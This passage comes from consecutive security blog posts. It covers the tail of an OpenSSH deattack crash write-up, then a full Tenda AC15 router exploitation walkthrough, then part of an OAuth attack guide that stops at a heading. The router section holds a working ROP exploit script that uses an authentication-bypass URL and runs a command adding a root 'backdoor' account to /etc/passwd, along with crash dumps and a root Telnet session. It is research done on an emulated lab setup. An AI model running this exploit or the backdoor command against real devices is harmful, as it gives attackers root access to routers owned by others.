		memset(buf, 'A', dsize - 1);
		buf[dsize] = '\x00';
		packet_put_string(buf, dsize);
		packet_send();
		packet_write_wait();
	}

	/* Send the name of the user to log in as on the server. */
	packet_start(SSH_CMSG_USER);
	packet_put_string(server_user, strlen(server_user));
	packet_send();
	packet_write_wait();

Running this patched client got the same crash as in the case of main.c.

Where to go now…

It is important to understand this exploit primitive has a lot of weaknesses.

The h buffer is a u_int16_t *. On a little endian system, so you can’t write any arbitrary value to (char *)h + 0. Not unless you set the upper bits of j. To be able to set all the upper bits of j, you need to be able to loop 0x10000 times.

From: src/deattack.c:135

	for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {

The loop goes over 8 (SSH_BLOCKSIZE) bytes at a time to increment j once. We need a buffer of size 0x80000 to do that. The following check restricts us to write only half of all possible j values.

From: src/deattack.c:93 - 96

	if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // len > 0x40000
	    len % SSH_BLOCKSIZE != 0) {
		fatal("detect_attack: bad length %d", len);
	}

Further, if you want to write the same value to two locations, you have to call the vulnerable function twice without crashing. But once you caused the static n to be 0, it stays 0 on the next re-entry. This will cause the l bit shifting loop to loop infinitely. No matter how much it tries, bit shifting 0 wont make it big enough to handle your buffer length. You could bypass this by using your arbitrary write to set n to any value that has a single bit set (ie 0x1, 0x2, 0x4…). If you use any other values (ie 0x3), then the math for the loop may come out differently.

None of this even accounts for the challenges awaiting outside the detect_attack function. If the checksum fails, do you lose your session? What happens if the ciphertext, your buffer, fails to decrypt?

This all has an influence on what route you want to take to RCE. Trinity’s exploit overwrote the root password with a new arbitrary string. Maybe this was done by pointing the logger at /etc/passwd? Is there an advantage in this over shell code? What about breaking the authentication flow and just flipping an “is authenticated” bit from false to true? Could you overwrite a client public key in memory to have an RSA exponent of 0? So many fun options to try. Can you make an exploit that bypasses ALSR?

Conclusion

Our goal was to crash a patched OpenSSH. We exceeded our own expectations given the time and resources available, crashing with control, an unpatched OpenSSH. This is due to teamwork and creative time saves during the processes of exploitation. There was a ton of theory crafting throughout the processes that helped us avoid time sinks. Most of all, there was a lot of fun.

!exploitable Episode One - Breaking IoT

2025-02-11T00:00:00+01:00

Introduction

For our last company retreat, the Doyensec team went on a cruise along the coasts of the Mediterranean Sea. As amazing as each stop was, us being geeks, we had to break the monotony of daily pool parties with some much-needed hacking sessions. Luca and John, our chiefs, came to the rescue with three challenges chosen to make us scratch our heads to get to a solution. The goal of each challenge was to analyze a real-world vulnerability with no known exploits and try to make one ourselves. The vulnerabilities were of three different categories: IoT, web, and binary exploitation; so we all chose which one we wanted to deal with, split into teams, and started working on it.

The name of this whole group activity was “!exploitable”. For those of you who don’t know what that is (I didn’t), it’s referring to an extension made by Microsoft for the WinDbg debugger. Using the !exploitable command, the debugger would analyze the state of the program and tell you what kind of vulnerability was there and if it looked exploitable.

As you may have guessed from the title, this first post is about the IoT challenge.

The Bug

The vulnerability we were tasked to investigate is a buffer overflow in the firmware of the Tenda AC15 router, known as CVE-2024-2850. The advisory also links to a markdown file on GitHub with more details and a simple proof of concept. While the repo has been taken down, the Wayback Machine archived the page.

The GitHub doc describes the vulnerability as a stack-based buffer overflow and says that the vulnerability can be triggered from the urls parameter of the /goform/saveParentControlInfo endpoint (part of the router’s control panel API). However, right off the bat, we notice some inconsistencies in the advisory. For starters, the attached screenshots clearly show that the urls parameter’s contents are copied into a buffer (v18) which was allocated with malloc, therefore the overflow should happen on the heap, not on the stack.

The page also includes a very simple proof of concept which is meant to crash the application by simply sending a request with a large payload. However, we find another inconsistency here, as the parameter used in the PoC is simply called u, instead of urls as described in the advisory text.

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/saveParentControlInfo"
payload = b"a"*1000

data = {"u": payload}
response = requests.post(url, data=data)
print(response.text)

These contradictions may very well be just copy-paste issues, so we didn’t really think about it too much. Moreover, if you do a quick Google search, you will find out that there is no shortage of bugs on this firmware and, more broadly, on Tenda routers – so we weren’t worried.

The Setup

The first step was to get a working setup to run the vulnerable firmware. Normally, you would need to fetch the firmware, extract the binary, and emulate it using QEMU (NB: not including a million troubleshooting steps in the middle). But we were on a ship, with a very intermittent Internet connection, and there was no way we could have gotten everything working without StackOverflow.

Luckily, there is an amazing project called EMUX that is built for vulnerability exploitation exercises, exactly what we needed. Simply put, EMUX runs QEMU in a Docker container. The amazing part is that it already includes many vulnerable ARM and MIPS firmwares (including the Tenda AC15 one); it also takes care of networking, patching the binary for specific hardware checks, and many tools (such as GDB with GEF) are preinstalled, which is very convenient. If you are interested in how the Tenda AC15 was emulated, you can find a blog post from the tool’s author here.

After following the simple setup steps on EMUX’s README page, we were presented with the router’s control panel exposed on 127.0.0.1:20080 (the password is ringzer0).

From the name of the vulnerable endpoint, we can infer that the affected functionality has something to do with parental controls. Therefore, we log in to the control panel, click on the “Parental Control” item on the sidebar, and try to create a new parental control rule. Here is what the form looks like from the web interface:

And here’s the request sent to the API, confirming our suspicion that this is where the vulnerability is triggered:

POST /goform/saveParentControlInfo HTTP/1.1
Host: 127.0.0.1:20080
Content-Length: 154
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: password=ce80adc6ed1ab2b7f2c85b5fdcd8babcrlscvb
Connection: keep-alive

deviceId=de:ad:be:ef:13:37&deviceName=test&enable=1&time=19:00-21:00&url_enable=1&urls=google.com&day=1,1,1,1,1,1,1&limit_type=0

As expected, the proof of concept from the original advisory did not work out of the box. Firstly, because apparently the affected endpoint is only accessible after authentication, and then because the u parameter was indeed incorrect. After we added an authentication step to the script and fixed the parameter name, we indeed got a crash. After manually “fuzzing” the request a bit and checking the app’s behavior, we decided it was time to try and hook GDB to the server process to get more insights on the crashes.

Through EMUX, we spawned a shell in the emulated system and used ps to check what was running on the OS, which was actually not much (omitting some irrelevant/repeated processes for clarity):

  698 root       0:02 {run-init} /bin/bash ./run-init
 1518 root       0:00 {emuxinit} /bin/sh /.emux/emuxinit
 1548 root       0:58 cfmd
 1549 root       0:00 udevd
 1550 root       0:00 logserver
 1566 root       0:00 nginx: master process nginx -p /var/nginx
 1568 root       0:00 nginx: worker process
 1569 root       0:00 /usr/bin/app_data_center
 1570 root       0:16 moniter
 1573 root       0:00 telnetd
 1942 root       0:02 cfmd
 1944 root       0:23 netctrl
 1945 root       2:00 time_check
 1947 root       1:48 multiWAN
 1950 root       0:01 time_check
 1953 root       0:04 ucloud_v2 -l 4
 1959 root       0:00 business_proc -l 4
 1977 root       0:02 netctrl
 2064 root       0:09 dnrd -a 192.168.100.2 -t 3 -M 600 --cache=2000:4000 -b -R /etc/dnrd -r 3 -s 8.8.8.8
 2068 root       0:00 business_proc -l 4
 2087 root       0:01 dhttpd
 2244 root       0:01 multiWAN
 2348 root       0:03 miniupnpd -f /etc/miniupnpd.config
 4670 root       0:00 /usr/sbin/dropbear -p 22222 -R
 4671 root       0:00 -sh
 4966 root       0:07 sntp 1 17 86400 50 time.windows.com
 7382 root       0:11 httpd
 8820 root       0:00 {run-binsh} /bin/bash ./run-binsh
 8844 root       0:00 {emuxshell} /bin/sh /.emux/emuxshell
 8845 root       0:00 /bin/sh
 9008 root       0:00 /bin/sh -c sleep 40; /root/test-eth0.sh >/dev/null 2>&1
 9107 root       0:00 ps

The process list didn’t show anything too interesting. From the process list you can see that there is a dropbear SSH server, but this is actually started by EMUX to communicate between the host and the emulated system, and it’s not part of the original firmware. A telnetd server is also running, which is common for routers. The httpd process seemed to be what we had been looking for; netstat confirmed that httpd is the process listening on port 80.

tcp   0   0 0.0.0.0:9000        0.0.0.0:*  LISTEN  1953/ucloud_v2
tcp   0   0 0.0.0.0:22222       0.0.0.0:*  LISTEN  665/dropbear
tcp   0   0 192.168.100.2:80    0.0.0.0:*  LISTEN  7382/httpd
tcp   0   0 172.27.175.218:80   0.0.0.0:*  LISTEN  2087/dhttpd
tcp   0   0 127.0.0.1:10002     0.0.0.0:*  LISTEN  1953/ucloud_v2
tcp   0   0 127.0.0.1:10003     0.0.0.0:*  LISTEN  1953/ucloud_v2
tcp   0   0 0.0.0.0:10004       0.0.0.0:*  LISTEN  1954/business_proc
tcp   0   0 0.0.0.0:8180        0.0.0.0:*  LISTEN  1566/nginx
tcp   0   0 0.0.0.0:5500        0.0.0.0:*  LISTEN  2348/miniupnpd
tcp   0   0 127.0.0.1:8188      0.0.0.0:*  LISTEN  1569/app_data_cente
tcp   0   0 :::22222            :::*       LISTEN  665/dropbear
tcp   0   0 :::23               :::*       LISTEN  1573/telnetd

At this point, we just needed to attach GDB to it. We spent more time than I care to admit building a cross-toolchain, compiling GDB, and figuring out how to attach to it from our M1 macs. Don’t do this, just read the manual instead. If we did, we would have discovered that GDB is already included in the container.

To access it, simply execute the ./emux-docker-shell script and run the emuxgdb command followed by the process you want to attach to. There are also other useful tools available, such as emuxps and emuxmaps.

Analyzing the crashes with GDB helped us get a rough idea of what was happening, but nowhere near a “let’s make an exploit” level. We confirmed that the saveParentControlInfo function was definitely vulnerable and we agreed that it was time to decompile the function to better understand what was going on.

The Investigation

The Binary

To start our investigation, we extracted the httpd binary from the emulated system. After the first launch, the router’s filesystem is extracted in /emux/AC15/squashfs-root, therefore you can simply copy the binary over with docker cp emux-docker:/emux/AC15/squashfs-root/bin/httpd ..

Once copied, we checked the binary’s security flags with pwntool’s checksec:

[*] 'httpd'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

Here is a breakdown of what these means:

NX (No eXecute) is the only applied mitigation; it means code cannot be executed from some memory areas, such as the stack or the heap. This effectively prevents us from dumping some shellcode into a buffer and jumping into it.
RELRO (Read-Only Relocation) makes some memory areas read-only instead, such as the Global Offset Table (GOT). The GOT stores the addresses of dynamically linked functions. When RELRO is not enabled, an arbitrary write primitive could allow an attacker to replace the address of a function in the GOT with an arbitrary one and redirect the execution when the hijacked function is called.
A stack canary is a random value placed on the stack right before the final return pointer. The program will check that the stack canary is correct before returning, effectively preventing stack overflows from rewriting the return pointer, unless you are able to leak the canary value using a different vulnerability.
PIE (Position Independent Executable) means that the binary itself can be loaded anywhere in memory, and its base address will be chosen randomly every time it is launched. Therefore, a “No PIE” binary is always loaded at the same address, 0x8000 in this case. Note that this only applies to the binary itself, while the addresses of other segments such as shared libraries and stack/heap will still be randomized if ASLR is activated.

Regarding ASLR, we checked if it was enabled by running cat /proc/sys/kernel/randomize_va_space on the emulated system and the result was 0 (i.e., disabled). We are not sure whether ASLR is enabled on the real device or not, but, given the little time available, we decided to just use this to our advantage.

Because practically all mitigations were deactivated, we had no limitations on which exploit technique to use.

The Function

We fired up Ghidra and spent some time trying to understand the code, while fixing the names and types of variables and functions with the hope of getting a better picture of what the function did. Luckily we did, and here’s a recap of what the function does:

Allocates all the stack variables and buffers

int iVar1;
byte bVar2;
bool bVar3;
char time_to [32];
char time_from [32];
int rule_index;
char acStack_394 [128];
int id_list [30];
byte parsed_days [8];
undefined parent_control_id [512];
undefined auStack_94 [64];
byte *rule_buffer;
byte *deviceId_buffer;
char *deviceName_param;
char *limit_type_param;
char *connectType_param;
char *block_param;
char *day_param;
char *urls_param;
char *url_enable_param;
char *time_param;
char *enable_param;
char *deviceId_param;
undefined4 local_24;
undefined4 local_20;
int count;
int rule_id;
int i;

Reads the body parameters into separate heap-allocated buffers:

deviceId_param = readBodyParam(client,"deviceId","");
enable_param = readBodyParam(client,"enable","");
time_param = readBodyParam(client,"time","");
url_enable_param = readBodyParam(client,"url_enable","");
urls_param = readBodyParam(client,"urls","");
day_param = readBodyParam(client,"day","");
block_param = readBodyParam(client,"block","");
connectType_param = readBodyParam(client,"connectType","");
limit_type_param = readBodyParam(client,"limit_type","1");
deviceName_param = readBodyParam(client,"deviceName","");

Saves the device’s name and MAC address

if (*deviceName_param != '\0') {
  setDeviceName(deviceName_param,deviceId_param);
}

Splits the time parameter in time_to and time_from

if (*time_param != '\0') {
 for (int i = 0; i < 32; i++) {
     time_from[i] = '\0';
     time_to[i] = '\0';
 }

 sscanf(time_param,"%[^-]-%s",time_from,time_to);
 iVar1 = strcmp(time_from,time_to);
 if (iVar1 == 0) {
     writeResponseText(client, "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
     writeResponseText(client,"{\"errCode\":%d}",1);
     writeResponseStatusCode(client,200);
     return;
 }
}

Allocates some buffers in the heap for parsing and storing the parent control rule
Parses the other body fields – mostly just calls to strcpy and atoi – and stores the result in a big heap buffer
Performs some sanity checks (e.g., rule already exists, max number of rules reached) and saves the rule
Sends the HTTP response
Returns

You can find the full decompiled function in our GitHub repository.

Unfortunately, this analysis confirmed what we suspected all along. The urls parameter is always being copied between heap-allocated buffers, therefore this vulnerability is actually a heap overflow. Due the limited time and having a very poor Internet connection, we decided to just change the target and try to exploit a different bug.

An interesting piece of code that instantly caught our eye was the snippet pasted in step 4 where the time parameter is split into two values. This parameter is supposed to be a time range, such as 19.00-21.00, but the function needs the raw start and end times, therefore it needs to split it on the - character. To do so, the program calls sscanf with the format string "%[^-]-%s". The %[^-] part will match from the start of the string up to a hyphen (-), while %s will stop as soon as a whitespace character is found (both will stop at a null byte).

The interesting part is that time_from and time_to are both allocated on the stack with a size of 32 bytes each, as you can see from step 1 above. time_from seemed the perfect target to overflow, since it does not have the whitespace characters limitation; the only “prohibited” bytes in a payload would be null (\x00) and the hyphen (\x2D).

The Exploit

The strategy for the exploit was to implement a simple ROP chain to call system() and execute a shell command. For the uninitiated, ROP stands for Return-Oriented Programming and consists of writing a bunch of return pointers and data in the stack to make the program jump somewhere in memory and run small snippets of instructions (called gadgets) borrowed from other functions, before reaching a new return instruction and again jumping somewhere else, repeating the pattern until the chain is complete.

To start, we simply sent a bunch of As in the time parameter followed by -1 (to populate time_to) and observed the crash in GDB:

Program received signal SIGSEGV, Segmentation fault.
0x4024050c in strcpy () from target:/emux/AC15/squashfs-root/lib/libc.so.0
────────────────────────────────────────────────────────────────────────────────
$r0  : 0x001251ba  →  0x00000000
$r1  : 0x41414141 ("AAAA"?)
$r2  : 0x001251ba  →  0x00000000
$r3  : 0x001251ba  →  0x0000000
[...]

We indeed got a SEGFAULT, but in strcpy? Indeed, if we again check the variables allocated in step 1, time_from comes before all the char* variables pointing to where the other parameters are stored. When we overwrite time_from, these pointers will lead to an invalid memory address; therefore, when the program tries to parse them in step 6, we get a segmentation fault before we reach our sweet return instruction.

The solution for this issue was pretty straightforward: instead of spamming As, we can fill the gap with a valid pointer to a string, any string. Unfortunately, we can’t supply addresses to the main binary’s memory, since its base address is 0x8000 and, when converted to a 32bit pointer, it will always have a null byte at the beginning, which will stop sscanf from parsing the remaining payload. Let’s abuse the fact that ASLR is disabled and supply a string directly from the stack instead; the address of time_to seemed the perfect choice:

it comes before time_from, so it won’t get overwritten during the overflow
we can set it to a single digit, such as 1, and it will be valid when parsed as a string, integer, or boolean
being only a single byte we are sure we are not overflowing any other buffer

Using GDB, we could see that time_to was consistently allocated at address 0xbefff510. After some trial and error, we found a good amount of padding that would let us reach the return without causing any crashes in the middle of the function:

timeto_addr = p32(0xbefff510)
payload = b"A"*880
payload += timeto_addr * 17
payload += b"BBBB"

And, checking out the crash in GDB, we could see that we successfully controlled the program counter!

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
────────────────────────────────────────────────────────────────────────────────
$r0  : 0x108
$r1  : 0x0011fdd8  →  0x00120ee8  →  0x0011dc40  →  0x00000000
$r2  : 0x0011fdd8  →  0x00120ee8  →  0x0011dc40  →  0x00000000
$r3  : 0x77777777 ("wwww"?)
$r4  : 0xbefff510  →  0x00000000
$r5  : 0x00123230  →  "/goform/saveParentControlInfo"
$r6  : 0x1
$r7  : 0xbefffdd1  →  "httpd"
$r8  : 0x0000ec50  →  0xe1a0c00d
$r9  : 0x0002e450  →   push {r4,  r11,  lr}
$r10 : 0xbefffc28  →  0x00000000
$r11 : 0xbefff510  →  0x00000000
$r12 : 0x400dcedc  →  0x400d2a50  →  <__pthread_unlock+0> mov r3,  r0
$sp  : 0xbefff8d8  →  0x00000000
$lr  : 0x00010944  →   str r0,  [r11,  #-20]	; 0xffffffec
$pc  : 0x42424242 ("BBBB"?)
$cpsr: [negative zero CARRY overflow interrupt fast thumb]

The easiest way to execute a shell command now was to find a gadget chain that would let us invoke the system() function. The calling convention in the ARM architecture is to pass function arguments via registers. The system() function, specifically, accepts the string containing the command to execute as a pointer passed in the r0 register.

Let’s not forget that we also needed to write the command string somewhere in memory. If this was a local binary and not an HTTP server, we could have loaded the address of the /bin/sh string, that is commonly found somewhere in libc, but in this case, we need to specify a custom command in order to set up a backdoor or a reverse shell. The command string itself must terminate with a null byte, therefore we could not just put it in the middle of the padding before the payload. What we could do instead, was to put the string after the payload. With no ASLR, the string’s address will be fixed regardless, and the string’s null byte will just be the null byte at the end of the whole payload.

After loading the command string’s address in r0, we needed to “return” to system(). Regarding this, I have a small confession to make. Even though I talked about a return instruction until now, in the ARM32 architecture there is no such thing; a return is simply performed by loading an address into the pc register, which may be done with many different instructions. The simplest example that loads an address from the stack is pop {pc}.

As a recap, what we needed to do is:

write the command string’s address in the stack
load the address in r0
write the system() function address in the stack
load the address in pc

In order to do that, we used ropper to look for gadgets similar to pop {r0}; pop {pc}, but it was not easy to find a suitable one without a null byte in its address. Luckily, we actually found a nice pop {r0, pc} instruction inside libc.so, accomplishing both tasks at once.

With GDB, we got the address of __libc_system (don’t make the mistake of searching for just system, it’s not the right function) and calculated the address where the command string would be written to. We now had everything needed to run a shell command! But which command?

We checked which binaries were in the system to look for something that could give us a reverse shell, like a Python or Ruby interpreter, but we could not find anything useful. We could have cross-compiled a custom reverse shell binary, but we decided to go for a much quicker solution: just use the existing Telnet server. We could simply create a backdoor user by adding a line to /etc/passwd, and then log in with that. The command string would be the following:

echo 'backdoor:$1$xyz$ufCh61iwD3FifSl2zK3EI0:0:0:injected:/:/bin/sh' >> /etc/passwd

Note: you can generate a valid hash for the /etc/passwd file with the following command:

openssl passwd -1 -salt xyz hunter2

Finally, here’s what the complete exploit looks like:

#!/usr/bin/env python3
import requests
import random
import sys
import struct

p32 = lambda addr: struct.pack("<I", addr) # Equivalent to pwn.p32

def gen_payload():
    timeto_addr = p32(0xbefff510)      # addr of the time_to string on the stack, i.e. "1"
    system_addr = p32(0x4025c270)      # addr of the system function
    cmd = "echo 'backdoor:$1$xyz$ufCh61iwD3FifSl2zK3EI0:0:0:injected:/:/bin/sh' >> /etc/passwd" # command to run with system()
    cmd_str_addr = p32(0xbefff8e0)     # addr of the cmd string on the stack
    pop_r0_pc = p32(0x4023fb80)        # addr of 'pop {r0, pc}' gadget
    
    payload = b"A"*880                 # stuff we don't care about
    payload += timeto_addr * 17        # addr of the time_to str from the stack, i.e. "1"
                                       # here we are overwriting a bunch of ptrs to strings which are strcpy-ed before we reach ret
                                       # so let's overwrite them with a valid str ptr to ensure it doesn't segfault prematurely
    payload += pop_r0_pc               # ret ptr is here. we jump to 'pop {r0, pc}' gadget to load the cmd string ptr into r0
    payload += cmd_str_addr            # addr of the cmd string from the stack, to be loaded in r0
    payload += system_addr             # addr of system, to be loaded in pc
    payload += cmd.encode()            # the "cmd" string itself, placed at the end so it ends with '\0'
    
    return payload

def exploit(target: str):
    name = "test" + ''.join([str(i) for i in [random.randint(0,9) for _ in range(5)]])
    res = requests.post(
        f"http://{target}/goform/saveParentControlInfo?img/main-logo.png", # Use CVE-2021-44971 Auth Bypass: https://github.com/21Gun5/my_cve/blob/main/tenda/bypass_auth.md
        data={
            "deviceId":"00:00:00:00:00:02",
            "deviceName":name,
            "enable":0,
            "time": gen_payload() + b"-1",
            "url_enable":1,
            "urls":"x.com",
            "day":"1,1,1,1,1,1,1",
            "limit_type":1
            }
    )
    print("Exploit sent")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} IP:PORT")
        sys.exit()
    target = sys.argv[1]
    try:
        input("Press enter to send exploit")
        exploit(target)
        print("Done! Login to Telnet with backdoor:hunter2")
    except Exception as e:
        print(e)
        print("Connection closed unexpectedly")

The exploit worked flawlessly and added a new “backdoor” user to the system. We could then simply connect with Telnet to have a full root shell.

The final exploit is also available in the GitHub repository.

$ telnet 127.0.0.1 20023
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Tenda login: backdoor
Password:
~ # cat /etc/passwd
root:$1$nalENqL8$jnRFwb1x5S.ygN.3nwTbG1:0:0:root:/:/bin/sh
admin:6HgsSsJIEOc2U:0:0:Administrator:/:/bin/sh
support:Ead09Ca6IhzZY:0:0:Technical Support:/:/bin/sh
user:tGqcT.qjxbEik:0:0:Normal User:/:/bin/sh
nobody:VBcCXSNG7zBAY:0:0:nobody for ftp:/:/bin/sh
backdoor:$1$xyz$ufCh61iwD3FifSl2zK3EI0:0:0:injected:/:/bin/sh

Conclusion

After the activity we investigated a bit and found out that the specific vulnerability we ended up exploiting was already known as CVE-2020-13393. As far as we can tell, our PoC is the first working exploit for this specific endpoint. Its usefulness is diminished however, due to the plethora of other exploits already available for this platform.

Nevertheless, this challenge was such a nice learning experience. We got to dive deeper into the ARM architecture and sharpen our exploit development skills. Working together, with no reliable Internet also allowed us to share knowledge and approach problems from different perspectives.

If you’ve read this far, nice, well done! Keep an eye on our blog to make sure you don’t miss the next Web and Binary !exploitable episodes.

Common OAuth Vulnerabilities

2025-01-30T00:00:00+01:00

OAuth2’s popularity makes it a prime target for attackers. While it simplifies user login, its complexity can lead to misconfigurations that create security holes. Some of the more intricate vulnerabilities keep reappearing because the protocol’s inner workings are not always well-understood. In an effort to change that, we have decided to write a comprehensive guide on known attacks against OAuth implementations. Additionally, we have created a comprehensive checklist. It should prove useful for testers and developers alike to quickly assess whether their implementation is secure.

Download the OAuth Security Cheat Sheet Now! Doyensec_OAuth_CheatSheet.pdf.

OAuth Introduction

OAuth Terminology

OAuth is a complex protocol with a many actors and moving parts. Before we dive into its inner workings, let’s review its terminology:

Resource Owner: Entity that can grant access to a protected resource. Typically, this is the end-user.
Client: Application requesting access to a protected resource on behalf of the Resource Owner.
Resource Server: Server hosting the protected resources. This is the API you want to access.
Authorization Server: Server that authenticates the Resource Owner and issues Access Tokens after getting proper authorization. For example, Auth0.
User Agent: Agent used by the Resource Owner to interact with the Client (for example, a browser or a native application).

References

OAuth 2.0 RFC: https://datatracker.ietf.org/doc/html/rfc6749
OAuth Terminology: #oauth-2-0-terminology

OAuth Common Flows

Attacks against OAuth rely on challenging various assumptions the authorization flows are built upon. It is therefore crucial to understand the flows to efficiently attack and defend OAuth implementations. Here’s the high-level description of the most popular of them.

Implicit Flow

The Implicit Flow was originally designed for native or single-page apps that cannot securely store Client Credentials. However, its use is now discouraged and is not included in the OAuth 2.1 specification. Despite this, it is still a viable authentication solution within Open ID Connect (OIDC) to retrieve id_tokens.

In this flow, the User Agent is redirected to the Authorization Server. After performing authentication and consent, the Authorization Server directly returns the Access Token, making it accessible to the Resource Owner. This approach exposes the Access Token to the User Agent, which could be compromised through vulnerabilities like XSS or a flawed redirect_uri validation. The implicit flow transports the Access Token as part of the URL if the response_mode is not set to form_post.

References

Authorization Code Flow

The Authorization Code Flow is one of the most widely used OAuth flows in web applications. Unlike the Implicit Flow, which requests the Access Token directly to the Authorization Server, the Authorization Code Flow introduces an intermediary step. In this process, the User Agent first retrieves an Authorization Code, which the application then exchanges, along with the Client Credentials, for an Access Token. This additional step ensures that only the Client Application has access to the Access Token, preventing the User Agent from ever seeing it.

This flow is suitable exclusively for confidential applications, such as Regular Web Applications, because the application Client Credentials are included in the code exchange request and they must be kept securely stored by the Client Application.

References

Authorization Code Flow with PKCE

OAuth 2.0 provides a version of the Authorization Code Flow which makes use of a Proof Key for Code Exchange (PKCE). This OAuth flow was originally designed for applications that cannot store a Client Secret, such as native or single-page apps but it has become the main recommendation in the OAuth 2.1 specification.

Two new parameters are added to the default Authorization Code Flow, a random generated value called code_verifier and its transformed version, the code_challenge.

First, the Client creates and records a secret code_verifier and derives a transformed version t(code_verifier), referred to as the code_challenge, which is sent in the Authorization Request along with the transformation method t_m used.
The Client then sends the Authorization Code in the Access Token Request with the code_verifier secret.
Finally, the Authorization Server transforms code_verifier and compares it to t(code_verifier)

The available transformation methods (t_m) are the following:

plain code_challenge = code_verifier
S256 code_challenge = BASE64URL-ENCODE(SHA256(ASCII(code_verifier)))

Note that using the default Authorization Code flow with a custom redirect_uri scheme like example.app:// can allow a malicious app to register itself as a handler for this custom scheme alongside the legitimate OAuth 2.0 app. If this happens, the malicious app can intercept the authorization code and exchange it for an Access Token. For more details, refer to OAuth Redirect Scheme Hijacking.

With PKCE, the interception of the Authorization Response will not allow the previous attack scenario since attackers would only be able to access the authorization_code but it won’t be possible for them to get the code_verifier value required in the Access Token Request.

The diagram below illustrates the Authorization Code flow with PKCE:

References

https://datatracker.ietf.org/doc/html/rfc7636

Client Credentials Flow

The Client Credentials Flow is designed for Machine-to-Machine (M2M) applications, such as daemons or backend services. It is useful when the Client is also the Resource Owner, eliminating the need for User Agent authentication. This flow allows the Client to directly retrieve an Access Token by providing the Client Credentials.

The diagram below illustrates the Client Credentials Flow:

References

Device Authorization Flow

The Device Authorization Flow is designed for Internet-connected devices that either lack a browser for user-agent-based authorization or are too input-constrained to make text-based authentication practical during the authorization flow.

This flow allows OAuth Clients on devices such as smart TVs, media consoles, digital picture frames or printer to obtain user authorization to access protected resources using a User Agent on a separate device.

In this flow, first the Client application retrieves a User Code and Verification URL from the Authorization Server. Then, it instructs the User Agent to Authenticate and Consent with a different device using the provided User Code and Verification URL.

The following image illustrates the Device Authorization Code Flow:

References

Resource Owner Password Credentials Flow

This flow requires the Resource Owner to fully trust the Client with their credentials to the Authorization Server. It was designed for use-cases when redirect-based flows cannot be used, although, it has been removed in the recent OAuth 2.1 RFC specification and its use is not recommended.

Instead of redirecting the Resource Owner to the Authorization Server, the user credentials are sent to the Client application, which then forwards them to the Authorization Server.

The following image illustrates the Resource Owner Password Credentials Flow:

References

Attacks

In this section we’ll present common attacks against OAuth with basic remediation strategies.

CSRF

OAuth CSRF is an attack against OAuth flows, where the browser consuming the authorization code is different than the one that has initiated the flow. It can be used by an attacker to coerce the victim to consume their Authorization Code, causing the victim to connect with attacker’s authorization context.

Consider the following diagram:

Depending on the context of the application, the impact can vary from low to high. In either case it is vital to ensure that user has the control of which authorization context they operate in and cannot be coerced into another one.

Mitigation

OAuth specification recommends to utilize the state parameter to prevent CSRF attacks.

[state is] an opaque value used by the client to maintain state between the request and callback. The authorization server includes this value when redirecting the user-agent back to the client. The parameter SHOULD be used for preventing cross-site request forgery (CSRF).

The following scheme illustrates how the state parameter can prevents the attack:

References

Justin Richer, Antonio Sanso, (2017), OAuth 2 In Action

Redirect Attacks

Well implemented Authorization Servers validate the redirect_uri parameter before redirecting the User Agent back to the Client. The allowlist of redirect_uri values should be configured per-client. Such design ensures that the User Agent can only be redirected to the Client and the Authorization Code will be only disclosed to the given Client. Conversely, if the Authorization Server neglects or misimplements this verification, a malicious actor can manipulate a victim to complete a flow that will disclose their Authorization Code to an untrusted party.

In the simplest form, when redirect_uri validation is missing altogether, exploitation can be illustrated with the following flow:

This vulnerability can also emerge when validation is inadequately implemented. The only proper way is validation by comparing the exact redirect_uri including both the origin (scheme, hostname, port) and the path.

Common mistakes include:

validating only origin/domain
allowing subdomains
allowing subpaths
allowing wildcards

If the given origin includes a URL with an open redirect vulnerability, or pages with user-controlled content, they can abused to steal the code through the Referer header, or through the open redirect.

On the other hand, the following overlooks:

partial path matching
misusing regular expressions to match URIs

may lead to various bypasses by crafting a malicious URLs, that will lead to an untrusted origins.

References

Justin Richer, Antonio Sanso, (2017), OAuth 2 In Action

Mutable Claims Attack

According to the OAuth specification, users are uniquely identified by the sub field. However there is no standard format of this field. As a result, many different formats are used, depending on the Authorization Server. Some of the Client applications, in an effort to craft a uniform way of identifying users across multiple Authorization Servers, fall back to user handles, or emails. However this approach may be dangerous, depending on the Authorization Server used. Some of the Authorization Servers do not guarantee immutability for such user properties. Even worse so, in some cases these properties can be arbitrarily changed by the users themselves. In such cases account takeovers might be possible.

One of such cases emerges, when the feature “Login with Microsoft” is implemented to use the email field to identify users.. In such cases, an attacker might create their own AD organization (doyensectestorg in this case) on Azure, which can be used then to to perform “Login with Microsoft”. While the Object ID field, which is placed in sub, is immutable for a given user and cannot be spoofed, the email field is purely user-controlled and does not require any verification.

In the screenshot above, there’s an example user created, that could be used to take over an account victim@gmail.com in the Client, which uses the email field for user identification.

References

Client Confusion Attack

When applications implement OAuth Implicit Flow for authentication they should verify that the final provided token was generated for that specific Client ID. If this check is not performed, it would be possible for an attacker to use an Access Token that had been generated for a different Client ID.

Imagine the attacker creates a public website which allows users to log in with Google’s OAuth Implicit flow. Assuming thousands of people connect to the hosted website, the attacker would then have access to their Google’s OAuth Access Tokens generated for the attacker website.

If any of these users already had an account on a vulnerable website that does not verify the Access Token, the attacker would be able to provide the victim’s Access Token generated for a different Client ID and will be able to take over the account of the victim.

A secure OAuth Implicit Flow implemented for authentication would be as follows:

If steps 8 to 10 are not performed and the token’s Client ID is not validated, it would be possible to perform the following attack:

Remediation

It is worth noting, that even if the Client uses a more secure flow (e.g. Explicit Flow), it might accept Access Tokens - effectively allowing a downgrade to the Implicit Flow. Additionally, if the application uses the Access Tokens as session cookies or authorization headers it might be vulnerable. In practice, ensuring that the Access Tokens are never accepted from user-controlled parameters breaks the exploitation chain early. On top of that we recommend performing token verification as described above in steps 8 to 10.

References

https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts

Scope Upgrade Attack

